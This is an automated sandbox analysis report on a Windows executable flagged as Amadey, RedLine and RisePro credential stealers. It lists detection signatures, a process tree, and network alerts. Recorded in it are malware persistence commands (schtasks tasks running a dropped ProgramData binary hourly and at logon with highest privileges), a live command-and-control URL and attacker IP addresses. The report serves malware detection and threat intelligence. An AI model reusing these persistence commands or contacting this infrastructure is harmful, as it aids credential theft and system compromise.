Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe
Analysis ID:	1376410
MD5:	eca58abd2b3fdfdde6f1f710933106db
SHA1:	c18e99f7a4a86bb3ec6f12615c8df42e129efddb
SHA256:	d6129782008ef7b311bc4c3f513067ba99acfd6afbaea447af511257145bfc08
Tags:	exe
Infos:

Detection

Amadey, RedLine, RisePro Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Amadeys Clipper DLL

Yara detected Amadeys stealer DLL

Yara detected RedLine Stealer

Yara detected RisePro Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains very large array initializations

Allocates memory in foreign processes

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Contains functionality to check for running processes (XOR)

Contains functionality to inject code into remote processes

Contains functionality to inject threads in other processes

Creates HTML files with .exe extension (expired dropper behavior)

Creates an undocumented autostart registry key

Downloads suspicious files via Chrome

Found API chain indicative of sandbox detection

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found stalling execution ending in API Sleep call

Hides threads from debuggers

Injects a PE file into a foreign processes

Machine Learning detection for sample

PE file has nameless sections

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Abnormal high CPU Usage

Checks if the current process is being debugged

Connects to many different domains

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

One or more processes crash

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe (PID: 796 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe MD5: ECA58ABD2B3FDFDDE6F1F710933106DB)

RegAsm.exe (PID: 5868 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

schtasks.exe (PID: 5864 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3892 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PXBvYMcLF9IUsaGl9axr.exe (PID: 1656 cmdline: "C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe" MD5: F3CFA7E6835A51B52B5B2F4173C5D047)

explorhe.exe (PID: 10012 cmdline: "C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe" MD5: F3CFA7E6835A51B52B5B2F4173C5D047)

3kaNpKWTvXjwLZn_llOJ.exe (PID: 2144 cmdline: "C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe" MD5: B325B839AB0CFD002C5FD1CEC765C60B)

chrome.exe (PID: 2704 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.youtube.com/ MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 1080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1888,i,5407564702306654445,10850688961270417415,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 2992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.facebook.com/login MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 3488 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 --field-trial-handle=2324,i,2541819260191282002,938598577275048364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 3352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://accounts.google.com/ MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 7492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1976,i,13067442516428966182,10510495334177241877,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

msedge.exe (PID: 7340 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 5688 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2088,i,9284688159329358542,7565992651462353756,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 7660 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/login MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 8364 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2080,i,6539887644468832511,10903315424592384845,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 7928 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 8612 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2104,i,14647974237917707437,3396227101640439639,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

chrome.exe (PID: 6268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 1756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 8356 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

firefox.exe (PID: 8636 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 9040 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 9120 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

WerFault.exe (PID: 9048 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 2376 MD5: C31336C1EFC2CCB44B4326EA793040F2)

MPGPH131.exe (PID: 6272 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MPGPH131.exe (PID: 1464 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RageMP131.exe (PID: 2792 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 1416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RageMP131.exe (PID: 5076 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 4552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 8540 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 8060 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2024,i,5041607828718283965,3196036969284588987,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 9896 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6444 --field-trial-handle=2024,i,5041607828718283965,3196036969284588987,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 9908 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6620 --field-trial-handle=2024,i,5041607828718283965,3196036969284588987,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)

firefox.exe (PID: 9832 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 9272 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 7480 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 2632 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 7604 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Amadey

{"C2 url": ["http://185.215.113.68/theme/index.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Temp\xVorLOq_sWZyw11ZiThUZWTpoEoWfgdl.zip	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000F.00000002.2431950677.0000000000DB1000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.2596470514.00000000015D9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
0000002E.00000002.4707775638.0000000000951000.00000040.00000001.01000000.00000010.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2084693372.00000000043F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000002.00000002.2594202655.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5868	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: explorhe.exe PID: 10012	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.RegAsm.exe.15e7e63.2.raw.unpack	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
2.2.RegAsm.exe.15e622d.1.raw.unpack	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
46.2.explorhe.exe.950000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.RegAsm.exe.15e7e63.2.unpack	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
15.2.PXBvYMcLF9IUsaGl9axr.exe.db0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
2.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe.43f5570.0.raw.unpack	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
2.2.RegAsm.exe.15e622d.1.unpack	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Click to see the 4 entries

Snort Signatures

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849884802856147 01/18/24-00:35:01.569689
SID:	2856147
Source Port:	49884
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850246802856147 01/18/24-00:35:46.109412
SID:	2856147
Source Port:	50246
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850442802856147 01/18/24-00:37:16.870428
SID:	2856147
Source Port:	50442
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850292802856147 01/18/24-00:35:56.372585
SID:	2856147
Source Port:	50292
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850540802856147 01/18/24-00:38:13.988122
SID:	2856147
Source Port:	50540
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CURRENT_EVENTS DRIVEBY Likely Evil EXE with no referer from HFS webserver (used by Unknown EK) - Source IP: 194.33.191.102 - Destination IP: 192.168.2.6

Timestamp:	194.33.191.102192.168.2.680498002020500 01/18/24-00:34:54.176140
SID:	2020500
Source Port:	80
Destination Port:	49800
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850519802856147 01/18/24-00:38:02.446106
SID:	2856147
Source Port:	50519
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850010802856147 01/18/24-00:35:17.843362
SID:	2856147
Source Port:	50010
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.6 - Destination IP: 194.33.191.102

Timestamp:	192.168.2.6194.33.191.10249850217512043231 01/18/24-00:35:16.149478
SID:	2043231
Source Port:	49850
Destination Port:	21751
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850264802856147 01/18/24-00:35:50.591634
SID:	2856147
Source Port:	50264
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850311802856147 01/18/24-00:36:03.121723
SID:	2856147
Source Port:	50311
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850133802856147 01/18/24-00:35:27.881708
SID:	2856147
Source Port:	50133
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850387802856147 01/18/24-00:36:45.721629
SID:	2856147
Source Port:	50387
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850308802856147 01/18/24-00:36:01.434890
SID:	2856147
Source Port:	50308
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850406802856147 01/18/24-00:36:57.586662
SID:	2856147
Source Port:	50406
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850504802856147 01/18/24-00:37:53.649635
SID:	2856147
Source Port:	50504
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850452802856147 01/18/24-00:37:23.457086
SID:	2856147
Source Port:	50452
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850316802856147 01/18/24-00:36:06.686804
SID:	2856147
Source Port:	50316
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850369802856147 01/18/24-00:36:35.950752
SID:	2856147
Source Port:	50369
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Kelihos.F EXE Download Common Structure - Source IP: 192.168.2.6 - Destination IP: 194.33.191.102

Timestamp:	192.168.2.6194.33.191.10249800802017598 01/18/24-00:34:53.954739
SID:	2017598
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850184802856147 01/18/24-00:35:38.861049
SID:	2856147
Source Port:	50184
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850143802856147 01/18/24-00:35:31.323052
SID:	2856147
Source Port:	50143
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850397802856147 01/18/24-00:36:52.351062
SID:	2856147
Source Port:	50397
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850470802856147 01/18/24-00:37:33.364101
SID:	2856147
Source Port:	50470
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850529802856147 01/18/24-00:38:08.471299
SID:	2856147
Source Port:	50529
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850279802856147 01/18/24-00:35:53.073661
SID:	2856147
Source Port:	50279
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850434802856147 01/18/24-00:37:12.429885
SID:	2856147
Source Port:	50434
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849838802044696 01/18/24-00:34:56.984327
SID:	2044696
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850560802856147 01/18/24-00:38:21.763380
SID:	2856147
Source Port:	50560
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850404802856147 01/18/24-00:36:56.479822
SID:	2856147
Source Port:	50404
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850462802856147 01/18/24-00:37:28.966118
SID:	2856147
Source Port:	50462
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850318802856147 01/18/24-00:36:08.386371
SID:	2856147
Source Port:	50318
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850321802856147 01/18/24-00:36:10.359178
SID:	2856147
Source Port:	50321
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850324802856147 01/18/24-00:36:12.051310
SID:	2856147
Source Port:	50324
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850578802856147 01/18/24-00:38:30.405992
SID:	2856147
Source Port:	50578
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.6 - Destination IP: 194.33.191.102

Timestamp:	192.168.2.6194.33.191.10249850217512046045 01/18/24-00:34:58.558535
SID:	2046045
Source Port:	49850
Destination Port:	21751
Protocol:	TCP
Classtype:	A Network Trojan was detected

